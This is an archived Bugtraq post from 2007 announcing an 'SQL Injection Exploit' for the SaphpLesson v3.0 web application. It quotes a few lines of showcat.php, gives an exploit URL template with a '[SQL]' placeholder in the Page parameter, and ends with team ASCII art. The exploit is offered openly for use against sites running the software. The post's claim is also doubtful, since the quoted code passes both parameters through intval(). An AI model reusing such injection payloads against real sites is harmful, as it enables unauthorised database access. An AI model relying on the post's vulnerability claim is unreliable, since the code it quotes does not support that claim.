Bugtraq mailing list archives

SaphpLesson v3.0 SQL Injection Exploit


From: gamr-14 () hotmail com
Date: 22 Feb 2007 09:25:01 -0000


//////////////////2007/////////////////////
//SaphpLesson v3.0 SQL Injection Exploit//
//////////////////////////////////////////
################################
Found by:SwEET-DeViL&HaCKeR sUn#
TeaM AL-GaRNi------------------#
Application : SaphpLesson------#
version : v3.0-----------------#
URL : No-----------------------#
################################
-------------------------------------------------------------------------------
Line 19'/'23 of showcat.php                                                  ||
---------------<?                                                            ||
$forumid = intval($_GET["forumid"]);                                         ||
                                                                             ||
$Page    = intval($_GET["Page"]);                                            ||
                                                                             ||
$tit     = mysql_query("select Title,CatID from forums where id=$forumid");  ||
?>-----------------------------------------------------------------------------

ExploiTs :-
""""""""""
http://www.Site.com/Path/showcat.php?forumid=1&Page=-1[SQL]);#

/*'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''/*
END
 ___________K-S-A______________
|ÜÜÜÜÜÜTeam AL-GaRNiÜÜÜÜÜÜÜÜÜÜÜ|
:::::::::::::::::::::::::::::::::
::-###########-----###########-::
::-###########-----###########-::
::-###-------------###-----###-::
::-###-------------###########-::
::-###---######----###########-::
::-###---##-###----###--###----::
::-###------###----###---###---::
::-############----###----###--::
::-############----###----###--::
:::::::::::::::::::::::::::::::::
|ÜÜÜÜÜgamr-14 () hotmail comÜÜÜÜÜÜÜ|
|ÜÜÜÜÜÜÜÜÜm-o-t () msn comÜÜÜÜÜÜÜÜÜ|


Current thread: